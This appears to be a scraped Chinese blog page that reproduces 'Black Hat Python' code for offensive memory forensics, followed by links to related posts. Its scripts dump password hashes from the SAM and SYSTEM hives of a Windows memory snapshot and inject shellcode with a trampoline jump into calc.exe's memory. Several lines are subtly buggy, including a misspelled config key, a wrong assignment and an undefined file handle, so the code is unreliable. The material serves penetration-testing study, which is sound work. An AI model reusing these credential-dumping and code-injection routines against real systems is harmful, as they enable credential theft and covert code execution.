import sys

import struct

memory_file = "WinXPenSP3-Snapshot8.vmem"

sys.path.append("C:\\Python27\\volatility-2.3.1")

import volatility.conf as conf

import volatility.registry as registry

registry.PluginImporter()

config = conf.ConfObject()

import volatility.commands as commands

import volatility.addrspace as addrspace

config.parse_options()

config.PROFILE = "WinXPenSP3x86"

config.LOCALTION = "file://%s"%memory_file

registry.register_global_options(config,commands.Command)

registry.register_global_options(config,addrspace.BaseAddressSpace)

from volatility.plugins.registry.registryapi import RegistryApi

from volatility.plugins.registry.lsadump import HashDump

registry = RegistryApi(config)

registry.populate_offsets()

sam_offset = None

sys_offset = None

for offset in registry.all_offsets:

    if registry.all_offsets[offset].endswith("\\SAM"):

        sam_offset = offset

        print "[*] SAM: 0x%08x"%offset

    if registry.all_offsets[offset].endswith("\\system"):

        sys_offset = offset

        print "[*] System: 0x%08x"%offset

    if sam_offset is not None and sys_offset is not None:

        config.sys_offset = sys_offset

        config.sam_offset = sam_offset

        hashdump = HashDump(config)

        for hash in hashdump.calculate():

            print hash

        break

if sam_offset is None or sys_offset is None:

    print "[*] Failed to find the system or SAM offsets."

直接代码注入

from immlib import *

class cc_hook(LogBpHook):

    """docstring for cc_hook"""

    def __init__(self,):

        LogBpHook.__init__(self)

        self.imm = Debugger()

    def run(self,regs):

        self.imm.log("%08x"%regs['EIP'],regs['EIP'])

        self.imm.deleteBreakpoint(regs['EIP'])

        return

def main(args):

    imm = Debugger()

    calc = imm.getModule("calc.exe")

    imm.analyseCode(calc.getCodebase())

    functions = imm.getAllFunctions(calc.getCodebase())

    hooker = cc_hook()

    for function in functions:

        hooker.add("%08x"%function,function)

    return "Tracking %d functions."%len(functions)
#coding=utf-8

import sys

import struct

equals_button = 0x01005D51

memory_file = "WinXPenSP3-Snapshot8.vmem"

slack_space = None

trampoline_offset = None

#读入我们的shellcode

sc_fd = open("cmeasure.bin","rb")

sc = sc_fd.read()

sc_fd.close()

sys.path.append("C:\\Python27\\volatility-2.3.1")

import volatility.conf as conf

import volatility.registry as registry

registry.PluginImporter()

config = conf.ConfObject()

import volatility.commands as commands

import volatility.addrspace as addrspace

config.parse_options()

config.PROFILE = "WinXPSP3x86"

config.LOCALTION = "file://%s"%memory_file

import volatility.plugins.taskmods as taskmods

p = taskmods.PSList(config)

for process in p.calculate():

    if str(process.ImageFileName) == "calc.exe":

        print "[*] Found calc.exe with PID %d"%process.UniqueProcessId

        print "[*] Hunting for physical offsets...please wait."

        address_space = process.get_process_address_space()

        pages = address_space.get_available_pages()

        for page in pages:

            physical = address_space.vtop(page[0])

            if physical is not None:

                if slack_space is None:

                    fd = open(memory_file,"r+")

                    fd.seek(physical)

                    buf = fd.read(page[1])

                    try:

                        offset = buf.index("\x00"*len(sc))

                        slack_space = page[0] + offset

                        print "[*] Found good shellcode location!"

                        print "[*] Virtual address: 0x%08x"%slack_space

                        print "[*] Physical address: 0x%08x"%(physical + offset)

                        print "[*] Injecting shellcode."

                        fd.seek(physical + offset)

                        fd.write(sc)

                        fd.close()

                        #创建我们的跳转代码

                        tramp = "\xbb%s"%struct.pack("<L",page[0] + offset)

                        tramp += "\xff\xe3"

                        if trampoline_offset is not None:

                            break

                    except:

                        pass

                    fd.close()

                #查看目标代码的位置

                if page[0] <= equals_button and equals_button < ((page[0] + page[1]) - 7):

                    print "[*] Found our trampoline target at: 0x%08x"%(physical)

                    #计算虚拟偏移

                    v_offset = equals_button = page[0]

                    #计算物理偏移

                    trampoline_offset = physical + v_offset

                    print "[*] Found our trampoline target at: 0x%08x"%(trampoline_offset)

                    if slack_space is not None:

                        break

        print "[*] Writing trampoline..."

        fd = open(memory_file,"r+")

        fd.seek(trampoline_offset)

        fd.write(tramp)

        f.close()

        print "[*] Done injecting code."

《Python黑帽子:黑客与渗透测试编程之道》 自动化攻击取证的更多相关文章

  1. python黑帽子-黑客与渗透测试编程之道(源代码)

    链接: https://pan.baidu.com/s/1i5BnB5V   密码: ak9t

  2. 读书笔记 ~ Python黑帽子 黑客与渗透测试编程之道

    Python黑帽子  黑客与渗透测试编程之道   <<< 持续更新中>>> 第一章: 设置python 环境 1.python软件包管理工具安装 root@star ...

  3. 2017-2018-2 20179204 PYTHON黑帽子 黑客与渗透测试编程之道

    python代码见码云:20179204_gege 参考博客Python黑帽子--黑客与渗透测试编程之道.关于<Python黑帽子:黑客与渗透测试编程之道>的学习笔记 第2章 网络基础 t ...

  4. 《Python黑帽子:黑客与渗透测试编程之道》 扩展Burp代理

    下载jython,在Burpsuite的扩展中配置jython路径: Burp模糊测试: #!/usr/bin/python #coding=utf-8 # 导入三个类,其中IBurpExtender ...

  5. 《Python黑帽子:黑客与渗透测试编程之道》 Web攻击

    Web的套接字函数库:urllib2 一开始以urllib2.py命名脚本,在Sublime Text中运行会出错,纠错后发现是重名了,改过来就好: #!/usr/bin/python #coding ...

  6. 《Python黑帽子:黑客与渗透测试编程之道》 Scapy:网络的掌控者

    窃取email认证: 测试代码: #!/usr/bin/python #coding=utf-8 from scapy.all import * #数据包回调函数 def packet_callbac ...

  7. 《Python黑帽子:黑客与渗透测试编程之道》 网络基础

    TCP客户端: 示例中socket对象有两个参数,AF_INET参数表明使用IPv4地址或主机名 SOCK_STREAM参数表示是一个TCP客户端.访问的URL是百度. #coding=utf-8 i ...

  8. 《Python黑帽子:黑客与渗透测试编程之道》 玩转浏览器

    基于浏览器的中间人攻击: #coding=utf-8 import win32com.client import time import urlparse import urllib data_rec ...

  9. 《Python黑帽子:黑客与渗透测试编程之道》 Windows下木马的常用功能

    有趣的键盘记录: 安装pyHook: http://nchc.dl.sourceforge.net/project/pyhook/pyhook/1.5.1/pyHook-1.5.1.win32-py2 ...

  10. 《Python黑帽子:黑客与渗透测试编程之道》 基于GitHub的命令和控制

    GitHub账号设置: 这部分按书上来敲命令即可,当然首先要注册一个GitHub账号还有之前安装的GitHub API库(pip install github3.py),这里就只列一下命令吧: mkd ...

随机推荐

  1. 【Linux】percona-toolkit工具包的安装

    一.检查和安装与Perl相关的模块 PT工具是使用Perl语言编写和执行的,所以需要系统中有Perl环境. 依赖包检查命令为: rpm -qa perl-DBI perl-DBD-MySQL perl ...

  2. JNI,RegisterNative参数解析

    Register native method - 数据类型和method descriptor 使用JNI时,为了使得虚拟机可以找到在C/C++ code中定义的native方法,有两种机制可以用,一 ...

  3. 2019.01.22 bzoj3333: 排队计划(逆序对+线段树)

    传送门 题意简述:给出一个序列,支持把ppp~nnn中所有小于等于apa_pap​的'扯出来排序之后再放回去,要求动态维护全局逆序对. 思路:我们令fif_ifi​表示第iii个位置之后比它大的数的个 ...

  4. 2019.01.16 bzoj3526: [Poi2014]Card(线段树)

    传送门 线段树菜题. 题意:有一些卡牌,正反各有一个数,你可以任意翻转,每次操作会将两张卡牌的位置调换,你需要在每次操作后回答以现在的卡牌顺序能否通过反转形成一个单调不降的序列. 思路: 对于一个线段 ...

  5. 2018.11.02 NOIP模拟 距离(斜率优化dp)

    传送门 分四个方向分别讨论. 每次枚举当前行iii,然后对于第二维jjj用斜率优化dpdpdp. f[i][j]=(j−k)2+mindisk2f[i][j]=(j-k)^2+mindis_k^2f[ ...

  6. Educational Codeforces Round 53 (Rated for Div. 2) E. Segment Sum

    https://codeforces.com/contest/1073/problem/E 题意 求出l到r之间的符合要求的数之和,结果取模998244353 要求:组成数的数位所用的数字种类不超过k ...

  7. PHP-CGI、FASTCGI和php-fpm的关系

    首先,CGI是干嘛的?CGI是为了保证web server传递过来的数据是标准格式的,方便CGI程序的编写者. web server(比如说nginx)只是内容的分发者.比如,如果请求/index.h ...

  8. rm与管道使用

    一 问题初始:用通常意义的管道使用这样可以:(1)ls -l | sed -n '/~$/p' 我用显示出系统自己建立的备份文件这时,我想删除这些文件,我仍然使用了管道,并执行了以下命令(2)ls - ...

  9. VSCode 设置侧边栏字体大小;Visual Studio Code改变侧边栏大小

    1.代码改写,进入默认安装的如下路径 C:\Users\Administrator\AppData\Local\Programs\Microsoft VS Code\resources\app\out ...

  10. c#内存中创建反射

    代码 IWFP_SYS_Bytes mywfpbyte; /**/ byte[] bin=null; using (FileStream fs = new FileStream(filename, F ...